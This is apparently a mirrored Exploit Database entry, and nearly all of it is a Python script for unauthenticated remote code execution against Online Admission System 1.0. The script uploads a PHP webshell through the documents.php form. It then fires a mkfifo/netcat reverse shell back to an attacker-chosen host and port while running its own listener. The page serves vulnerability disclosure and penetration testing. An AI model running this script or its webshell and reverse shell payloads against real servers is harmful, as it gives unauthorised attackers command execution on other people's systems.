Online Admission System 1.0 – Remote Code Execution (RCE) (Unauthenticated)

• Exploit Database
• 13 阅读

• 作者： Jeremiasz Pluta
  日期： 2022-01-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50623/

• # Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
  # Date: 23/12/2021
  # Exploit Author: Jeremiasz Pluta
  # Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System
  # Software Link: https://github.com/rskoolrash/Online-Admission-System
  # Tested on: LAMP Stack (Debian 10)
  
  #!/usr/bin/python
  import sys
  import re
  import argparse
  import requests
  import time
  import subprocess
  
  print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)')
  
  path = '/' #change me if the path to the /oas is in the root directory or another subdir
  
  class Exploit:
  
  	def __init__(self, target_ip, target_port, localhost, localport):
  		self.target_ip = target_ip
  		self.target_port = target_port
  		self.localhost = localhost
  		self.localport = localport
  
  	def exploitation(self):
  		payload = """<?php system($_GET['cmd']); ?>"""
  		payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""
  
  		url = 'http://' + target_ip + ':' + target_port + path
  		r = requests.Session()
  
  		print('[*] Resolving URL...')
  		r1 = r.get(url + 'documents.php')
  		time.sleep(3)
  
  		#Upload the payload file
  		print('[*] Uploading the webshell payload...')
  		files = {
  		'fpic': ('cmd.php', payload + '\n', 'application/x-php'),
  		'ftndoc': ('', '', 'application/octet-stream'),
  		'ftcdoc': ('', '', 'application/octet-stream'),
  		'fdmdoc': ('', '', 'application/octet-stream'),
  		'ftcdoc': ('', '', 'application/octet-stream'),
  		'fdcdoc': ('', '', 'application/octet-stream'),
  		'fide': ('', '', 'application/octet-stream'),
  		'fsig': ('', '', 'application/octet-stream'),
  		}
  		data = {'fpicup':'Submit Query'}
  		r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data)
  		time.sleep(3)
  
  		print('[*] Setting up netcat listener...')
  		listener = subprocess.Popen(["nc", "-nvlp", self.localport])
  		time.sleep(3)
  
  		print('[*] Spawning reverse shell...')
  		print('[*] Watchout!')
  		r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2)
  		time.sleep(3)
  
  		if (r3.status_code == 200):
  			print('[*] Got shell!')
  			while True:
  				listener.wait()
  		else:
  			print('[-] Something went wrong!')
  			listener.terminate()
  
  def get_args():
  	parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)')
  	parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
  	parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
  	parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
  	parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
  	args = parser.parse_args()
  	return args
  
  args = get_args()
  target_ip = args.url
  target_port = args.target_port
  localhost = args.localhost
  localport = args.localport
  
  exp = Exploit(target_ip, target_port, localhost, localport)
  exp.exploitation()